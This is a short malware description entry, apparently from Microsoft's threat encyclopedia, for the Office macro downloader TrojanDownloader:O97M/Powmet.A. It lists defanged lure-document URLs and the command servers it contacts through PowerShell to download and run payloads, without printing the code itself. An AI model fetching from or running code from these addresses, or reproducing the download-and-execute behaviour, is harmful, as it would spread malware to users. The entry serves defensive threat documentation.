Home / malwarePDF  

TrojanDownloader:O97M/Powmet.A


First posted on 19 February 2017.
Source: Microsoft

Aliases :

There are no other names known for TrojanDownloader:O97M/Powmet.A.

Explanation :

This threat is a macro code contained in contained in malicious documents. It is executed when the document is opened and macro is enabled.

We've seen it hosted in the following websites:

  • hxxp:// moh.com-ho.me /Health_insurance_registration.doc
  • hxxp:// briefl.ink /qhtma
  • hxxp:// briefl.ink /0j74w
  • hxxp:// briefl.ink /5re8r
  • hxxp:// briefl.ink /rf2ue
  • hxxp:// briefl.ink /bs3n5
  • hxxp:// briefl.ink /ol8x4
  • hxxp:// mol.com-ho.me /cv_itworx.doc
  • hxxp:// mol.com-ho.me /job_titles.doc


When executed, it runs a Power Shell command to download and execute malicious files from the following URLs:
  • hxxp:// 139.59.46.154 :3485/eiloShaegae1
  • hxxp:// 139.59.46.154 :3485/eiloShaegae1
  • hxxp:// 139.59.46.154 :3485/eiloShaegae1
  • hxxp:// 89.107.62.39 :13569/eiloShaegae1
  • hxxp:// 89.107.62.39 :13569/eiloShaegae1
  • hxxp:// 139.59.46.154 :3485/eiloShaegae1
  • hxxp:// 139.59.46.154 :3485/eiloShaegae1


At the time of analysis, the URLs are inaccessible.





Analysis by Francis Tan Seng

Last update 19 February 2017

 

TOP

Malware :

Family: